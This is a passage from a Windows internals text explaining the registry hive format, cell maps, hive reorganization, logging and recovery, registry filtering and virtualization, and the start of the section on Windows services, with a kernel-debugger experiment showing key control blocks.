registry value.
e
c
el
l
_
D
A
T
A
S
u
b
k
e
y
-
li
st
c
el
l
C
M
_
K
E
Y
_I
N
D
E
X
A cell composed of a list of cell indexes for key cells that are
all subkeys of a common parent key.
V
al
u
e
-
li
st
c
el
l
C
M
_
K
E
Y
_I
N
D
E
X
A cell composed of a list of cell indexes for value cells that are
all values of a common parent key.
S
e
c
u
ri
C
M
_
K
E
A cell that contains a security descriptor. Security-descriptor
cells include a signature (ks) at the head of the cell and a
reference count that records the number of key nodes that
share the security descriptor. Multiple key cells can share
security-descriptor cells.
t
y
-
d
e
s
c
ri
p
t
o
r
c
el
l
Y
_
S
E
C
U
R
I
T
Y
A bin is the size of the new cell rounded up to the next block or page
boundary, whichever is higher. The system considers any space between the
end of the cell and the end of the bin to be free space that it can allocate to
other cells. Bins also have headers that contain a signature, hbin, and a field
that records the offset into the hive file of the bin and the bin’s size.
By using bins instead of cells, to track active parts of the registry,
Windows minimizes some management chores. For example, the system
usually allocates and deallocates bins less frequently than it does cells, which
lets the configuration manager manage memory more efficiently. When the
configuration manager reads a registry hive into memory, it reads the whole
hive, including empty bins, but it can choose to discard them later. When the
system adds and deletes cells in a hive, the hive can contain empty bins
interspersed with active bins. This situation is similar to disk fragmentation,
which occurs when the system creates and deletes files on the disk. When a
bin becomes empty, the configuration manager joins to the empty bin any
adjacent empty bins to form as large a contiguous empty bin as possible. The
configuration manager also joins adjacent deleted cells to form larger free
cells. (The configuration manager shrinks a hive only when bins at the end of
the hive become free. You can compact the registry by backing it up and
restoring it using the Windows RegSaveKey and RegReplaceKey functions,
which are used by the Windows Backup utility. Furthermore, the system
compacts the bins at hive initialization time using the Reorganization
algorithm, as described later.)
The links that create the structure of a hive are called cell indexes. A cell
index is the offset of a cell into the hive file minus the size of the base block.
Thus, a cell index is like a pointer from one cell to another cell that the
configuration manager interprets relative to the start of a hive. For example,
as you saw in Table 10-6, a cell that describes a key contains a field
specifying the cell index of its parent key; a cell index for a subkey specifies
the cell that describes the subkeys that are subordinate to the specified
subkey. A subkey-list cell contains a list of cell indexes that refer to the
subkey’s key cells. Therefore, if you want to locate, for example, the key cell
of subkey A whose parent is key B, you must first locate the cell containing
key B’s subkey list using the subkey-list cell index in key B’s cell. Then you
locate each of key B’s subkey cells by using the list of cell indexes in the
subkey-list cell. For each subkey cell, you check to see whether the subkey’s
name, which a key cell stores, matches the one you want to locate—in this
case, subkey A.
The distinction between cells, bins, and blocks can be confusing, so let’s
look at an example of a simple registry hive layout to help clarify the
differences. The sample registry hive file in Figure 10-3 contains a base
block and two bins. The first bin is empty, and the second bin contains
several cells. Logically, the hive has only two keys: the root key Root and a
subkey of Root, Sub Key. Root has two values, Val 1 and Val 2. A subkey-
list cell locates the root key’s subkey, and a value-list cell locates the root
key’s values. The free spaces in the second bin are empty cells. Figure 10-3
doesn’t show the security cells for the two keys, which would be present in a
hive.
Figure 10-3 Internal structure of a registry hive.
To optimize searches for both values and subkeys, the configuration
manager sorts subkey-list cells alphabetically. The configuration manager
can then perform a binary search when it looks for a subkey within a list of
subkeys. The configuration manager examines the subkey in the middle of
the list, and if the name of the subkey the configuration manager is looking
for alphabetically precedes the name of the middle subkey, the configuration
manager knows that the subkey is in the first half of the subkey list;
otherwise, the subkey is in the second half of the subkey list. This splitting
process continues until the configuration manager locates the subkey or finds
no match. Value-list cells aren’t sorted, however, so new values are always
added to the end of the list.
Cell maps
If hives never grew, the configuration manager could perform all its registry
management on the in-memory version of a hive as if the hive were a file.
Given a cell index, the configuration manager could calculate the location in
memory of a cell simply by adding the cell index, which is a hive file offset,
to the base of the in-memory hive image. Early in the system boot, this
process is exactly what Winload does with the SYSTEM hive: Winload reads
the entire SYSTEM hive into memory as a read-only hive and adds the cell
indexes to the base of the in-memory hive image to locate cells.
Unfortunately, hives grow as they take on new keys and values, which means
the system must allocate new reserved views and extend the hive file to store
the new bins that contain added keys and values. The reserved views that
keep the registry data in memory aren’t necessarily contiguous.
To deal with noncontiguous memory addresses referencing hive data in
memory, the configuration manager adopts a strategy similar to what the
Windows memory manager uses to map virtual memory addresses to
physical memory addresses. While a cell index is only an offset in the hive
file, the configuration manager employs a two-level scheme, which Figure
10-4 illustrates, when it represents the hive using the mapped views in the
registry process. The scheme takes as input a cell index (that is, a hive file
offset) and returns as output both the address in memory of the block the cell
index resides in and the address in memory of the block the cell resides in.
Remember that a bin can contain one or more blocks and that hives grow in
bins, so Windows always represents a bin with a contiguous region of
memory. Therefore, all blocks within a bin occur within the same 2-MB
hive’s mapped view.
Figure 10-4 Structure of a cell index.
To implement the mapping, the configuration manager divides a cell index
logically into fields, in the same way that the memory manager divides a
virtual address into fields. Windows interprets a cell index’s first field as an
index into a hive’s cell map directory. The cell map directory contains 1024
entries, each of which refers to a cell map table that contains 512 map entries.
An entry in this cell map table is specified by the second field in the cell
index. That entry locates the bin and block memory addresses of the cell.
In the final step of the translation process, the configuration manager
interprets the last field of the cell index as an offset into the identified block
to precisely locate a cell in memory. When a hive initializes, the
configuration manager dynamically creates the mapping tables, designating a
map entry for each block in the hive, and it adds and deletes tables from the
cell directory as the changing size of the hive requires.
Hive reorganization
As for real file systems, registry hives suffer fragmentation problems: when
cells in the bin are freed and it is not possible to coalescence them in a
contiguous manner, fragmented little chunks of free space are created into
various bins. If there is not enough available contiguous space for new cells,
new bins are appended at the end of the hive file, while the fragmented ones
will be rarely repurposed. To overcome this problem, starting from Windows
8.1, every time the configuration manager mounts a hive file, it checks
whether a hive’s reorganization needs to be performed. The configuration
manager records the time of the last reorganization in the hive’s basic block.
If the hive has valid log files, is not volatile, and if the time passed after the
previous reorganization is greater than seven days, the reorganization
operation is started. The reorganization is an operation that has two main
goals: shrink the hive file and optimize it. It starts by creating a new empty
hive that is identical to the original one but does not contains any cells in it.
The created clone is used to copy the root key of the original hive, with all its
values (but no subkeys). A complex algorithm analyzes all the child keys:
indeed, during its normal activity, the configuration manager records whether
a particular key is accessed, and, if so, stores an index representing the
current runtime phase of the operating system (Boot or normal) in its key
cell.
The reorganization algorithm first copies the keys accessed during the
normal execution of the OS, then the ones accessed during the boot phase,
and finally the keys that have not been accessed at all (since the last
reorganization). This operation groups all the different keys in contiguous
bins of the hive file. The copy operation, by definition, produces a
nonfragmented hive file (each cell is stored sequentially in the bin, and new
bin are always appended at the end of the file). Furthermore, the new hive
has the characteristic to contain hot and cold classes of keys stored in big
contiguous chunks. This result renders the boot and runtime phase of the
operating system much quicker when reading data from the registry.
The reorganization algorithm resets the access state of all the new copied
cells. In this way, the system can track the hive’s keys usage by restarting
from a neutral state. The new usage statistics will be consumed by the next
reorganization, which will start after seven days. The configuration manager
stores the results of a reorganization cycle in the
HKLM\SYSTEM\CurrentControlSet\Control\Session
Manager\Configuration Manager\Defrag registry key, as shown in Figure 10-
5. In the sample screenshot, the last reorganization was run on April 10, 2019
and saved 10 MB of fragmented hive space.
Figure 10-5 Registry reorganization data.
The registry namespace and operation
The configuration manager defines a key object type to integrate the
registry’s namespace with the kernel’s general namespace. The configuration
manager inserts a key object named Registry into the root of the Windows
namespace, which serves as the entry point to the registry. Regedit shows key
names in the form
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet, but the Windows
subsystem translates such names into their object namespace form (for
example, \Registry\Machine\System\CurrentControlSet). When the Windows
object manager parses this name, it encounters the key object by the name of
Registry first and hands the rest of the name to the configuration manager.
The configuration manager takes over the name parsing, looking through its
internal hive tree to find the desired key or value. Before we describe the
flow of control for a typical registry operation, we need to discuss key objects
and key control blocks. Whenever an application opens or creates a registry
key, the object manager gives a handle with which to reference the key to the
application. The handle corresponds to a key object that the configuration
manager allocates with the help of the object manager. By using the object
manager’s object support, the configuration manager takes advantage of the
security and reference-counting functionality that the object manager
provides.
For each open registry key, the configuration manager also allocates a key
control block. A key control block stores the name of the key, includes the
cell index of the key node that the control block refers to, and contains a flag
that notes whether the configuration manager needs to delete the key cell that
the key control block refers to when the last handle for the key closes.
Windows places all key control blocks into a hash table to enable quick
searches for existing key control blocks by name. A key object points to its
corresponding key control block, so if two applications open the same
registry key, each receives a key object, and both key objects point to a
common key control block.
When an application opens an existing registry key, the flow of control
starts with the application specifying the name of the key in a registry API
that invokes the object manager’s name-parsing routine. The object manager,
upon encountering the configuration manager’s registry key object in the
namespace, hands the path name to the configuration manager. The
configuration manager performs a lookup on the key control block hash
table. If the related key control block is found there, there’s no need for any
further work (no registry process attach is needed); otherwise, the lookup
provides the configuration manager with the closest key control block to the
searched key, and the lookup continues by attaching to the registry process
and using the in-memory hive data structures to search through keys and
subkeys to find the specified key. If the configuration manager finds the key
cell, the configuration manager searches the key control block tree to
determine whether the key is open (by the same application or another one).
The search routine is optimized to always start from the closest ancestor with
a key control block already opened. For example, if an application opens
\Registry\Machine\Key1\Subkey2, and \Registry\Machine is already open,
the parse routine uses the key control block of \Registry\Machine as a
starting point. If the key is open, the configuration manager increments the
existing key control block’s reference count. If the key isn’t open, the
configuration manager allocates a new key control block and inserts it into
the tree. Then the configuration manager allocates a key object, points the
key object at the key control block, detaches from the Registry process, and
returns control to the object manager, which returns a handle to the
application.
When an application creates a new registry key, the configuration manager
first finds the key cell for the new key’s parent. The configuration manager
then searches the list of free cells for the hive in which the new key will
reside to determine whether cells exist that are large enough to hold the new
key cell. If there aren’t any free cells large enough, the configuration
manager allocates a new bin and uses it for the cell, placing any space at the
end of the bin on the free cell list. The new key cell fills with pertinent
information—including the key’s name—and the configuration manager
adds the key cell to the subkey list of the parent key’s subkey-list cell.
Finally, the system stores the cell index of the parent cell in the new subkey’s
key cell.
The configuration manager uses a key control block’s reference count to
determine when to delete the key control block. When all the handles that
refer to a key in a key control block close, the reference count becomes 0,
which denotes that the key control block is no longer necessary. If an
application that calls an API to delete the key sets the delete flag, the
configuration manager can delete the associated key from the key’s hive
because it knows that no application is keeping the key open.
EXPERIMENT: Viewing key control blocks
You can use the kernel debugger to list all the key control blocks
allocated on a system with the !reg openkeys command.
Alternatively, if you want to view the key control block for a
particular open key, use !reg querykey:
Click here to view code image
0: kd> !reg querykey \Registry\machine\software\microsoft
Found KCB = ffffae08c156ae60 ::
\REGISTRY\MACHINE\SOFTWARE\MICROSOFT
Hive ffffae08c03b0000
KeyNode 00000225e8c3475c
[SubKeyAddr] [SubKeyName]
225e8d23e64 .NETFramework
225e8d24074 AccountsControl
225e8d240d4 Active Setup
225ec530f54 ActiveSync
225e8d241d4 Ads
225e8d2422c Advanced INF Setup
225e8d24294 ALG
225e8d242ec AllUserInstallAgent
225e8d24354 AMSI
225e8d243f4 Analog
225e8d2448c AppServiceProtocols
225ec661f4c AppV
225e8d2451c Assistance
225e8d2458c AuthHost
...
You can then examine a reported key control block with the !reg
kcb command:
Click here to view code image
kd> !reg kcb ffffae08c156ae60
Key : \REGISTRY\MACHINE\SOFTWARE\MICROSOFT
RefCount : 1f
Flags : CompressedName, Stable
ExtFlags :
Parent : 0xe1997368
KeyHive : 0xe1c8a768
KeyCell : 0x64e598 [cell index]
TotalLevels : 4
DelayedCloseIndex: 2048
MaxNameLen : 0x3c
MaxValueNameLen : 0x0
MaxValueDataLen : 0x0
LastWriteTime : 0x1c42501:0x7eb6d470
KeyBodyListHead : 0xe1034d70 0xe1034d70
SubKeyCount : 137
ValueCache.Count : 0
KCBLock : 0xe1034d40
KeyLock : 0xe1034d40
The Flags field indicates that the name is stored in compressed
form, and the SubKeyCount field shows that the key has 137
subkeys.
Stable storage
To make sure that a nonvolatile registry hive (one with an on-disk file) is
always in a recoverable state, the configuration manager uses log hives. Each
nonvolatile hive has an associated log hive, which is a hidden file with the
same base name as the hive and a logN extension. To ensure forward
progress, the configuration manager uses a dual-logging scheme. There are
potentially two log files: .log1 and .log2. If, for any reason, .log1 was written
but a failure occurred while writing dirty data to the primary log file, the next
time a flush happens, a switch to .log2 occurs with the cumulative dirty data.
If that fails as well, the cumulative dirty data (the data in .log1 and the data
that was dirtied in between) is saved in .log2. As a consequence, .log1 will be
used again next time around, until a successful write operation is done to the
primary log file. If no failure occurs, only .log1 is used.
For example, if you look in your %SystemRoot%\System32\Config
directory (and you have the Show Hidden Files And Folders folder option
selected and Hide Protected Operating System Files unselected; otherwise,
you won’t see any file), you’ll see System.log1, Sam.log1, and other .log1
and .log2 files. When a hive initializes, the configuration manager allocates a
bit array in which each bit represents a 512-byte portion, or sector, of the
hive. This array is called the dirty sector array because a bit set in the array
means that the system has modified the corresponding sector in the hive in
memory and must write the sector back to the hive file. (A bit not set means
that the corresponding sector is up to date with the in-memory hive’s
contents.)
When the creation of a new key or value or the modification of an existing
key or value takes place, the configuration manager notes the sectors of the
primary hive that change and writes them in the hive’s dirty sectors array in
memory. Then the configuration manager schedules a lazy flush operation, or
a log sync. The hive lazy writer system thread wakes up one minute after the
request to synchronize the hive’s log. It generates new log entries from the
in-memory hive sectors referenced by valid bits of the dirty sectors array and
writes them to the hive log files on disk. At the same time, the system flushes
all the registry modifications that take place between the time a hive sync is
requested and the time the hive sync occurs. The lazy writer uses low priority
I/Os and writes dirty sectors to the log file on disk (and not to the primary
hive). When a hive sync takes place, the next hive sync occurs no sooner than
one minute later.
If the lazy writer simply wrote all a hive’s dirty sectors to the hive file and
the system crashed in mid-operation, the hive file would be in an inconsistent
(corrupted) and unrecoverable state. To prevent such an occurrence, the lazy
writer first dumps the hive’s dirty sector array and all the dirty sectors to the
hive’s log file, increasing the log file’s size if necessary. A hive’s basic block
contains two sequence numbers. After the first flush operation (and not in the
subsequent flushes), the configuration manager updates one of the sequence
number, which become bigger than the second one. Thus, if the system
crashes during the write operations to the hive, at the next reboot the
configuration manager notices that the two sequence numbers in the hive’s
base block don’t match. The configuration manager can update the hive with
the dirty sectors in the hive’s log file to roll the hive forward. The hive is
then up to date and consistent.
After writing log entries in the hive’s log, the lazy flusher clears the
corresponding valid bits in the dirty sector array but inserts those bits in
another important vector: the unreconciled array. The latter is used by the
configuration manager to understand which log entries to write in the
primary hive. Thanks to the new incremental logging support (discussed
later), the primary hive file is rarely written during the runtime execution of
the operating system. The hive’s sync protocol (not to be confused by the log
sync) is the algorithm used to write all the in-memory and in-log registry’s
modifications to the primary hive file and to set the two sequence numbers in
the hive. It is indeed an expensive multistage operation that is described later.
The Reconciler, which is another type of lazy writer system thread, wakes
up once every hour, freezes up the log, and writes all the dirty log entries in
the primary hive file. The reconciliation algorithm knows which parts of the
in-memory hive to write to the primary file thanks to both the dirty sectors
and unreconciled array. Reconciliation happens rarely, though. If a system
crashes, the configuration manager has all the information needed to
reconstruct a hive, thanks to the log entries that have been already written in
the log files. Performing registry reconciliation only once per hour (or when
the size of the log is behind a threshold, which depends on the size of the
volume in which the hive reside) is a big performance improvement. The
only possible time window in which some data loss could happen in the hive
is between log flushes.
Note that the Reconciliation still does not update the second sequence
number in the main hive file. The two sequence numbers will be updated
with an equal value only in the “validation” phase (another form of hive
flushing), which happens only at the hive’s unload time (when an application
calls the RegUnloadKey API), when the system shuts down, or when the hive
is first loaded. This means that in most of the lifetime of the operating
system, the main registry hive is in a dirty state and needs its log file to be
correctly read.
The Windows Boot Loader also contains some code related to registry
reliability. For example, it can parse the System.log file before the kernel is
loaded and do repairs to fix consistency. Additionally, in certain cases of hive
corruption (such as if a base block, bin, or cell contains data that fails
consistency checks), the configuration manager can reinitialize corrupted
data structures, possibly deleting subkeys in the process, and continue normal
operation. If it must resort to a self-healing operation, it pops up a system
error dialog box notifying the user.
Incremental logging
As mentioned in the previous section, Windows 8.1 introduced a big
improvement on the performance of the hive sync algorithm thanks to
incremental logging. Normally, cells in a hive file can be in four different
states:
■ Clean The cell’s data is in the hive’s primary file and has not been
modified.
■ Dirty The cell’s data has been modified but resides only in memory.
■ Unreconciled The cell’s data has been modified and correctly written
to a log file but isn’t in the primary file yet.
■ Dirty and Unreconciled After the cell has been written to the log
file, it has been modified again. Only the first modification is on the
log file, whereas the last one resides in memory only.
The original pre-Windows 8.1 synchronization algorithm was executing
five seconds after one or more cells were modified. The algorithm can be
summarized in four steps:
1.
The configuration manager writes all the modified cells signaled by
the dirty vector in a single entry in the log file.
2.
It invalidates the hive’s base block (by setting only one sequence
number with an incremented value than the other one).
3.
It writes all the modified data on the primary hive’s file.
4.
It performs the validation of the primary hive (the validation sets the
two sequence numbers with an identical value in the primary hive
file).
To maintain the integrity and the recoverability of the hive, the algorithm
should emit a flush operation to the file system driver after each phase;
otherwise, corruption could happen. Flush operations on random access data
can be very expensive (especially on standard rotation disks).
Incremental logging solved the performance problem. In the legacy
algorithm, one single log entry was written containing all the dirty data
between multiple hive validations; the incremental model broke this
assumption. The new synchronization algorithm writes a single log entry
every time the lazy flusher executes, which, as discussed previously,
invalidates the primary hive’s base block only in the first time it executes.
Subsequent flushes continue to write new log entries without touching the
hive’s primary file. Every hour, or if the space in the log exhausts, the
Reconciler writes all the data stored in the log entries to the primary hive’s
file without performing the validation phase. In this way, space in the log file
is reclaimed while maintaining the recoverability of the hive. If the system
crashes at this stage, the log contains original entries that will be reapplied at
hive loading time; otherwise, new entries are reapplied at the beginning of
the log, and, in case the system crashes later, at hive load time only the new
entries in the log are applied.
Figure 10-6 shows the possible crash situations and how they are managed
by the incremental logging scheme. In case A, the system has written new
data to the hive in memory, and the lazy flusher has written the
corresponding entries in the log (but no reconciliation happened). When the
system restarts, the recovery procedure applies all the log entries to the
primary hive and validates the hive file again. In case B, the reconciler has
already written the data stored in the log entries to the primary hive before
the crash (no hive validation happened). At system reboot, the recovery
procedure reapplies the existing log entries, but no modification in the
primary hive file are made. Case C shows a similar situation of case B but
where a new entry has been written to the log after the reconciliation. In this
case, the recovery procedure writes only the last modification that is not in
the primary file.
Figure 10-6 Consequences of possible system crashes in different times.
The hive’s validation is performed only in certain (rare) cases. When a
hive is unloaded, the system performs reconciliation and then validates the
hive’s primary file. At the end of the validation, it sets the two sequence
numbers of the hive’s primary file to a new identical value and emits the last
file system flush request before unloading the hive from memory. When the
system restarts, the hive load’s code detects that the hive primary is in a clean
state (thanks to the two sequence numbers having the same value) and does
not start any form of the hive’s recovery procedure. Thanks to the new
incremental synchronization protocol, the operating system does not suffer
any longer for the performance penalties brought by the old legacy logging
protocol.
Note
Loading a hive created by Windows 8.1 or a newer operating system in
older machines is problematic in case the hive’s primary file is in a non-
clean state. The old OS (Windows 7, for example) has no idea how to
process the new log files. For this reason, Microsoft created the
RegHiveRecovery minifilter driver, which is distributed through the
Windows Assessment and Deployment Kit (ADK). The RegHiveRecovery
driver uses Registry callbacks, which intercept “hive load” requests from
the system and determine whether the hive’s primary file needs recovery
and uses incremental logs. If so, it performs the recovery and fixes the
hive’s primary file before the system has a chance to read it.
Registry filtering
The configuration manager in the Windows kernel implements a powerful
model of registry filtering, which allows for monitoring of registry activity by
tools such as Process Monitor. When a driver uses the callback mechanism, it
registers a callback function with the configuration manager. The
configuration manager executes the driver’s callback function before and
after the execution of registry system services so that the driver has full
visibility and control over registry accesses. Antivirus products that scan
registry data for viruses or prevent unauthorized processes from modifying
the registry are other users of the callback mechanism.
Registry callbacks are also associated with the concept of altitudes.
Altitudes are a way for different vendors to register a “height” on the registry
filtering stack so that the order in which the system calls each callback
routine can be deterministic and correct. This avoids a scenario in which an
antivirus product would scan encrypted keys before an encryption product
would run its own callback to decrypt them. With the Windows registry
callback model, both types of tools are assigned a base altitude corresponding
to the type of filtering they are doing—in this case, encryption versus
scanning. Secondly, companies that create these types of tools must register
with Microsoft so that within their own group, they will not collide with
similar or competing products.
The filtering model also includes the ability to either completely take over
the processing of the registry operation (bypassing the configuration manager
and preventing it from handling the request) or redirect the operation to a
different operation (such as WoW64’s registry redirection). Additionally, it is
also possible to modify the output parameters as well as the return value of a
registry operation.
Finally, drivers can assign and tag per-key or per-operation driver-defined
information for their own purposes. A driver can create and assign this
context data during a create or open operation, which the configuration
manager remembers and returns during each subsequent operation on the
key.
Registry virtualization
Windows 10 Anniversary Update (RS1) introduced registry virtualization for
Argon and Helium containers and the possibility to load differencing hives,
which adhere to the new hive version 1.6. Registry virtualization is provided
by both the configuration manager and the VReg driver (integrated in the
Windows kernel). The two components provide the following services:
■ Namespace redirection An application can redirect the content of a
virtual key to a real one in the host. The application can also redirect a
virtual key to a key belonging to a differencing hive, which is merged
to a root key in the host.
■ Registry merging Differencing hives are interpreted as a set of
differences from a base hive. The base hive represents the Base Layer,
which contains the Immutable registry view. Keys in a differencing
hive can be an addition to the base one or a subtraction. The latter are
called thumbstone keys.
The configuration manager, at phase 1 of the OS initialization, creates the
VRegDriver device object (with a proper security descriptor that allows only
SYSTEM and Administrator access) and the VRegConfigurationContext
object type, which represents the Silo context used for tracking the
namespace redirection and hive merging, which belongs to the container.
Server silos have been covered already in Chapter 3, “Processes and jobs,” of
Part 1.
Namespace redirection
Registry namespace redirection can be enabled only in a Silo container (both
Server and applications silos). An application, after it has created the silo (but
before starting it), sends an initialization IOCTL to the VReg device object,
passing the handle to the silo. The VReg driver creates an empty
configuration context and attaches it to the Silo object. It then creates a single
namespace node, which remaps the \Registry\WC root key of the container to
the host key because all containers share the same view of it. The
\Registry\WC root key is created for mounting all the hives that are
virtualized for the silo containers.
The VReg driver is a registry filter driver that uses the registry callbacks
mechanism for properly implementing the namespace redirection. At the first
time an application initializes a namespace redirection, the VReg driver
registers its main RegistryCallback notification routine (through an internal
API similar to CmRegisterCallbackEx). To properly add namespace
redirection to a root key, the application sends a Create Namespace Node
IOCTL to the VReg’s device and specifies the virtual key path (which will be
seen by the container), the real host key path, and the container’s job handle.
As a response, the VReg driver creates a new namespace node (a small data
structure that contains the key’s data and some flags) and adds it to the silo’s
configuration context.
After the application has finished configuring all the registry redirections
for the container, it attaches its own process (or a new spawned process) to
the silo object (using AssignProcessToJobObject—see Chapter 3 in Part 1 for
more details). From this point forward, each registry I/O emitted by the
containerized process will be intercepted by the VReg registry minifilter.
Let’s illustrate how namespace redirection works through an example.
Let’s assume that the modern application framework has set multiple
registry namespace redirections for a Centennial application. In particular,
one of the redirection nodes redirect keys from HKCU to the host
\Registry\WC\ a20834ea-8f46-c05f-46e2-a1b71f9f2f9cuser_sid key. At a
certain point in time, the Centennial application wants to create a new key
named AppA in the HKCU\Software\Microsoft parent key. When the process
calls the RegCreateKeyEx API, the Vreg registry callback intercepts the
request and gets the job’s configuration context. It then searches in the
context the closest namespace node to the key’s path specified by the caller.
If it does not find anything, it returns an object not found error: Operating on
nonvirtualized paths is not allowed for a container. Assuming that a
namespace node describing the root HKCU key exists in the context, and the
node is a parent of the HKCU\Software\Microsoft subkey, the VReg driver
replaces the relative path of the original virtual key with the parent host key
name and forwards the request to the configuration manager. So, in this case
the configuration manager really sees a request to create
\Registry\WC\a20834ea-8f46-c05f-46e2-
a1b71f9f2f9cuser_sid\Software\Microsoft\ AppA and succeeds. The
containerized application does not really detect any difference. From the
application side, the registry key is in the host HKCU.
Differencing hives
While namespace redirection is implemented in the VReg driver and is
available only in containerized environments, registry merging can also work
globally and is implemented mainly in the configuration manager itself.
(However, the VReg driver is still used as an entry-point, allowing the
mounting of differencing hives to base keys.) As stated in the previous
section, differencing hives use hive version 1.6, which is very similar to
version 1.5 but supports metadata for the differencing keys. Increasing the
hive version also prevents the possibility of mounting the hive in systems that
do not support registry virtualization.
An application can create a differencing hive and mount it globally in the
system or in a silo container by sending IOCTLs to the VReg device. The
Backup and Restore privileges are needed, though, so only administrative
applications can manage differencing hives. To mount a differencing hive,
the application fills a data structure with the name of the base key (called the
base layer; a base layer is the root key from which all the subkeys and values
contained in the differencing hive applies), the path of the differencing hive,
and a mount point. It then sends the data structure to the VReg driver through
the VR_LOAD_DIFFERENCING_HIVE control code. The mount point
contains a merge of the data contained in the differencing hive and the data
contained in the base layer.
The VReg driver maintains a list of all the loaded differencing hives in a
hash table. This allows the VReg driver to mount a differencing hive in
multiple mount points. As introduced previously, the Modern Application
Model uses random GUIDs in the \Registry\WC root key with the goal to
mount independent Centennial applications’ differencing hives. After an
entry in the hash table is created, the VReg driver simply forwards the
request to the CmLoadDifferencingKey internal configuration manager’s
function. The latter performs the majority of the work. It calls the registry
callbacks and loads the differencing hive. The creation of the hive proceeds
in a similar way as for a normal hive. After the hive is created by the lower
layer of the configuration manager, a key control block data structure is also
created. The new key control block is linked to the base layer key control
block.
When a request is directed to open or read values located in the key used
as a mount point, or in a child of it, the configuration manager knows that the
associated key control block represents a differencing hive. So, the parsing
procedure starts from the differencing hive. If the configuration manager
encounters a subkey in the differencing hive, it stops the parsing procedure
and yields the keys and data stored in the differencing hive. Otherwise, in
case no data is found in the differencing hive, the configuration manager
restarts the parsing procedure from the base hive. Another case verifies
whether a thumbstone key is found in the differencing hive: the configuration
manager hides the searched key and returns no data (or an error). Thumb
stones are indeed used to mark a key as deleted in the base hive.
The system supports three kinds of differencing hives:
■ Mutable hives can be written and updated. All the write requests
directed to the mount point (or to its children keys) are stored in the
differencing hive.
■ Immutable hives can’t be modified. This means that all the
modifications requested on a key that is located in the differencing
hive will fail.
■ Write-through hives represent differencing hives that are immutable,
but write requests directed to the mount point (or its children keys)
are redirected to the base layer (which is not immutable anymore).
The NT kernel and applications can also mount a differencing hive and
then apply namespace redirection on the top of its mount point, which allows
the implementation of complex virtualized configurations like the one
employed for Centennial applications (shown in Figure 10-7). The Modern
Application Model and the architecture of Centennial applications are
covered in Chapter 8.
Figure 10-7 Registry virtualization of the software hive in the Modern
Application Model for Centennial applications.
Registry optimizations
The configuration manager makes a few noteworthy performance
optimizations. First, virtually every registry key has a security descriptor that
protects access to the key. However, storing a unique security descriptor copy
for every key in a hive would be highly inefficient because the same security
settings often apply to entire subtrees of the registry. When the system
applies security to a key, the configuration manager checks a pool of the
unique security descriptors used within the same hive as the key to which
new security is being applied, and it shares any existing descriptor for the
key, ensuring that there is at most one copy of every unique security
descriptor in a hive.
The configuration manager also optimizes the way it stores key and value
names in a hive. Although the registry is fully Unicode-capable and specifies
all names using the Unicode convention, if a name contains only ASCII
characters, the configuration manager stores the name in ASCII form in the
hive. When the configuration manager reads the name (such as when
performing name lookups), it converts the name into Unicode form in
memory. Storing the name in ASCII form can significantly reduce the size of
a hive.
To minimize memory usage, key control blocks don’t store full key
registry path names. Instead, they reference only a key’s name. For example,
a key control block that refers to \Registry\System\Control would refer to the
name Control rather than to the full path. A further memory optimization is
that the configuration manager uses key name control blocks to store key
names, and all key control blocks for keys with the same name share the
same key name control block. To optimize performance, the configuration
manager stores the key control block names in a hash table for quick lookups.
To provide fast access to key control blocks, the configuration manager
stores frequently accessed key control blocks in the cache table, which is
configured as a hash table. When the configuration manager needs to look up
a key control block, it first checks the cache table. Finally, the configuration
manager has another cache, the delayed close table, that stores key control
blocks that applications close so that an application can quickly reopen a key
it has recently closed. To optimize lookups, these cache tables are stored for
each hive. The configuration manager removes the oldest key control blocks
from the delayed close table because it adds the most recently closed blocks
to the table.
Windows services
Almost every operating system has a mechanism to start processes at system
startup time not tied to an interactive user. In Windows, such processes are
called services or Windows services. Services are similar to UNIX daemon
processes and often implement the server side of client/server applications.
An example of a Windows service might be a web server because it must be
running regardless of whether anyone is logged on to the computer, and it
must start running when the system starts so that an administrator doesn’t
have to remember, or even be present, to start it.
Windows services consist of three components: a service application, a
service control program (SCP), and the Service Control Manager (SCM).
First, we describe service applications, service accounts, user and packaged
services, and all the operations of the SCM. Then we explain how autostart
services are started during the system boot. We also cover the steps the SCM
takes when a service fails during its startup and the way the SCM shuts down
services. We end with the description of the Shared service process and how
protected services are managed by the system.
Service applications
Service applications, such as web servers, consist of at least one executable
that runs as a Windows service. A user who wants to start, stop, or configure
a service uses a SCP. Although Windows supplies built-in SCPs (the most
common are the command-line tool sc.exe and the user interface provided by
the services.msc MMC snap-in) that provide generic start, stop, pause, and
continue functionality, some service applications include their own SCP that
allows administrators to specify configuration settings particular to the
service they manage.
Service applications are simply Windows executables (GUI or console)
with additional code to receive commands from the SCM as well as to
communicate the application’s status back to the SCM. Because most
services don’t have a user interface, they are built as console programs.
When you install an application that includes a service, the application’s
setup program (which usually acts as an SCP too) must register the service
with the system. To register the service, the setup program calls the Windows
CreateService function, a services-related function exported in Advapi32.dll
(%SystemRoot%\System32\ Advapi32.dll). Advapi32, the Advanced API
DLL, implements only a small portion of the client-side SCM APIs. All the
most important SCM client APIs are implemented in another DLL,
Sechost.dll, which is the host library for SCM and LSA client APIs. All the
SCM APIs not implemented in Advapi32.dll are simply forwarded to
Sechost.dll. Most of the SCM client APIs communicate with the Service
Control Manager through RPC. SCM is implemented in the Services.exe
binary. More details are described later in the “Service Control Manager”
section.
When a setup program registers a service by calling CreateService, an
RPC call is made to the SCM instance running on the target machine. The
SCM then creates a registry key for the service under
HKLM\SYSTEM\CurrentControlSet\Services. The Services key is the
nonvolatile representation of the SCM’s database. The individual keys for
each service define the path of the executable image that contains the service
as well as parameters and configuration options.
After creating a service, an installation or management application can
start the service via the StartService function. Because some service-based
applications also must initialize during the boot process to function, it’s not
unusual for a setup program to register a service as an autostart service, ask
the user to reboot the system to complete an installation, and let the SCM
start the service as the system boots.
When a program calls CreateService, it must specify a number of
parameters describing the service’s characteristics. The characteristics
include the service’s type (whether it’s a service that runs in its own process
rather than a service that shares a process with other services), the location of
the service’s executable image file, an optional display name, an optional
account name and password used to start the service in a particular account’s
security context, a start type that indicates whether the service starts
automatically when the system boots or manually under the direction of an
SCP, an error code that indicates how the system should react if the service
detects an error when starting, and, if the service starts automatically,
optional information that specifies when the service starts relative to other
services. While delay-loaded services are supported since Windows Vista,
Windows 7 introduced support for Triggered services, which are started or
stopped when one or more specific events are verified. An SCP can specify
trigger event information through the ChangeServiceConfig2 API.
A service application runs in a service process. A service process can host
one or more service applications. When the SCM starts a service process, the
process must immediately invoke the StartServiceCtrlDispatcher function
